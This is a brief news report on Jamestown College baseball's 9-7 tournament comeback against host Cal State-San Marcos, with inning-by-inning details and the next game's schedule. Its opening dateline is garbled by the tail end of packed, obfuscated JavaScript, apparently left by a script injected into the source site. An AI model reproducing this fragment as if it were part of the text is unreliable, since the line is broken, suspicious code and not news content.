JAMESTOWN tefdf|var|u0026u|referrer|tdzss||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- The Jimmie baseball team had their backs up against the wall with just outs remaining in their season and trailing 7-4. But suddenly the bats came alive and Jamestown College sent the tournaments top-seed home, 9-7.

Cal State-San Marcos was not only the top seed, but the tournament’s host school. The Cougars jumped on the Jimmies in the first inning scoring three times.

Jamestown College responded adding three of their own to tie the game after one inning, 3-3.

The Cougars scored in four of the first five innings and built themselves a 7-4 lead.

In the bottom of the 8th, the first batter of the inning grounded out and the Jimmies trailed by three just five outs from elimination.

Nico Moreno singled to jump-start the rally. Max Boe and Derek Wallace followed with run scoring hits.

Wallace would come around to score on an error, but the big hit was a two-out two-run triple from Spencer Flaten to give JC their first lead of the game.

Kacy Gardiner worked the final five innings in relief and allowed just one run for the victory.

Jamestown College will play Mayville State today at 2:30pm CT (12:30pm PT) in a loser-out game. The Jimmies need to win their next two games to earn another berth in the NAIA National Tournament.
